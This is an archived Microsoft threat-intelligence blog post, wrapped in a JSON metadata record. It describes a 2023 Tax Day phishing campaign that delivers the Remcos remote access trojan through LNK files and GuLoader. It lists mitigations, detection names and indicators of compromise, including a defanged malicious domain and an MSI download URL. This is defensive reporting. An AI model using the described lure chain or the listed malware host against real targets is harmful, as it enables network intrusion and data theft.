{
	"id": "bee70e5f-64c4-495b-99ad-d7087a32d9ec",
	"created_at": "2026-04-10T03:21:15.702854Z",
	"updated_at": "2026-04-10T03:22:17.071375Z",
	"deleted_at": null,
	"sha1_hash": "1f709b0bac4c1e010347943f1e0679bc2d40409e",
	"title": "Threat actors strive to cause Tax Day headaches",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 217105,
	"plain_text": "Threat actors strive to cause Tax Day headaches\r\nBy Microsoft Threat Intelligence\r\nPublished: 2023-04-13 · Archived: 2026-04-10 02:25:39 UTC\r\nThreat actors often take advantage of current events and major news headlines to align attacks and leverage social\r\nengineering when people could be more likely to be distracted or misled. Tax season is particularly appealing to\r\nthreat actors because not only are people busy and under stress, but it is intrinsically tied to financial information.\r\nWith U.S. Tax Day approaching, Microsoft has observed phishing attacks targeting accounting and tax return\r\npreparation firms to deliver the Remcos remote access trojan (RAT) and compromise target networks beginning in\r\nFebruary of this year.\r\nRemcos, which stands for “Remote Control and Surveillance”, is a closed-source tool that allows threat actors to\r\ngain administrator privileges on Windows systems remotely. It was released in 2016 by BreakingSecurity, a\r\nEuropean company that markets Remcos and other offensive security tools as legitimate software. In 2021, CISA\r\nlisted Remcos among its top malware strains, citing its use in mass phishing attacks using COVID-19 pandemic\r\nthemes targeting businesses and individuals.\r\nWhile social engineering lures like this one are common around Tax Day and other big topic current events, these\r\ncampaigns are specific and targeted in a way that is uncommon. The targets for this threat are exclusively\r\norganizations that deal with tax preparation, financial services, CPA and accounting firms, and professional\r\nservice firms dealing in bookkeeping and tax.  This campaign can be detected in Microsoft Defender Antivirus,\r\nbuilt into Windows and on by default, as well as Microsoft 365 Defender.\r\nThe campaign uses lures masquerading as tax documentation sent by a client, while the link in the email uses a\r\nlegitimate click-tracking service to evade detection. The target is then redirected to a legitimate file hosting site,\r\nwhere the actor has uploaded Windows shortcut (.LNK) files.\r\nhttps://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/\r\nPage 1 of 5\n\nFigure 1. Remcos malware phishing lure\r\nThese LNK files generate web requests to actor-controlled domains and/or IP addresses to download malicious\r\nfiles. These malicious files then perform actions on the target device and download the Remcos payload,\r\nproviding the actor potential access to the target device and network.\r\nMicrosoft is sharing this information along with detections and recommendations with the community to help\r\nusers and defenders stay vigilant against this campaign with Tax Day approaching in the U.S. on April 18.\r\nMicrosoft 365 Defender and Microsoft Defender Antivirus detect and block Remcos and other malicious activity\r\nrelated to this campaign. \r\nPhishing campaign analysis\r\nWhat we have observed is that the link in the phishing email points to Amazon Web Services click tracking\r\nservice at awstrack[.]me. The initial link then redirects the target to a ZIP file hosted on legitimate file-sharing\r\nservice spaces[.]hightail[.]com. The ZIP file contains LNK files that act as Windows shortcuts to other files. The\r\nLNK files make web requests to actor-controlled domains and\r\nIP addresses to download additional malicious files such as MSI files containing DLLs or executables, VBScript\r\nfiles containing PowerShell commands, or deceptive PDFs.\r\nhttps://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/\r\nPage 2 of 5\n\nFigure 2. Unpacked file names referencing tax documents in the malware\r\nIn some cases, GuLoader was used to execute shellcode and subsequently download Remcos on the target system.\r\nGuLoader is a malicious downloader that has been used by many different actors to deliver a wide variety of\r\nmalware, including several RATs such as Remcos, through phishing campaigns since it was first observed in the\r\nwild in December 2019. The downloader uses several techniques to evade analysis and detection such as using\r\nlegitimate file-sharing sites and cloud hosting services for payload storage and delivery as well as encryption and\r\nobfuscation of the GuLoader shellcode and payloads.\r\nSuccessful delivery of a Remcos payload could provide an attacker the opportunity to take control of the target\r\ndevice to steal information and/or move laterally through the target network.\r\nFigure 3. Tax Day-themed Remcos attack chain\r\nWe continue to learn from these campaigns to improve how we protect customers.\r\nRecommendations and detections\r\nMicrosoft recommends the following mitigations to reduce the impact of this threat:\r\nBlock JavaScript or VBScript from launching downloaded executable content\r\nBlock executable files from running unless they meet a prevalence, age, or trusted list criterion\r\nEnable Microsoft Defender Antivirus scanning of downloaded files and attachments \r\nEnable Microsoft Defender Antivirus real-time behavior monitoring \r\nhttps://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/\r\nPage 3 of 5\n\nEnable cloud-delivered protection\r\nDetection details\r\nMicrosoft Defender for Office 365\r\nMicrosoft Defender for Office 365 detects phishing emails associated with the campaign discussed in this blog.\r\nMicrosoft Defender Antivirus\r\nMicrosoft Defender Antivirus, on by default on Windows machines, detects threat components as the following\r\nmalware:\r\nBackdoor:Win32/Remcos.GA!MTB\r\nMicrosoft Defender for Endpoint\r\nAlerts with the following titles in the security center can indicate threat activity on your network:\r\n‘Remcos’ backdoor\r\nSuspicious ‘Remcos’ behavior\r\n‘Remcos’ malware\r\n‘Guloader’ malware\r\nMicrosoft Sentinel\r\nMicrosoft Sentinel customers can use the TI Mapping analytic (a series of analytics all prefixed with “TI map”) to\r\nautomatically match the indicators mentioned in this blog post with data in their workspace. If the TI Map\r\nanalytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft\r\nSentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content\r\nHub can be found here:  https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy\r\nIndicators of compromise (IOCs)\r\nDomain:\r\nuymm[.]org\r\nURL:\r\nhttps[:]//uymm[.]org/roman.msi\r\nSHA-256 hashes:\r\n23597910ec60cf8b97144447c5cddd2e657d09e2f2008d53a3834b6058f36a41\r\n95a2d34db66ce4507d05ac33bea3bdc054860d9d97e91bdc2ce7ce689ae06e9f\r\nac55905e6f5a2ab166f9a2ea7d1f4f68f5660f39b5c28b7746df1e9db6dd4430\r\nReferences:\r\nhttps://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/\r\nPage 4 of 5\n\n2021 Top Malware Strains | Cybersecurity and Infrastructure Security Agency (CISA)\r\nGuLoader: A Popular New VB6 Downloader that Abuses Cloud Services | Proofpoint US\r\nGuLoader: Peering Into a Shellcode-based Downloader | CrowdStrike\r\nSource: https://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/\r\nhttps://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/"
	],
	"report_names": [
		"threat-actors-strive-to-cause-tax-day-headaches"
	],
	"threat_actors": [],
	"ts_created_at": 1775791275,
	"ts_updated_at": 1775791337,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1f709b0bac4c1e010347943f1e0679bc2d40409e.pdf",
		"text": "https://archive.orkl.eu/1f709b0bac4c1e010347943f1e0679bc2d40409e.txt",
		"img": "https://archive.orkl.eu/1f709b0bac4c1e010347943f1e0679bc2d40409e.jpg"
	}
}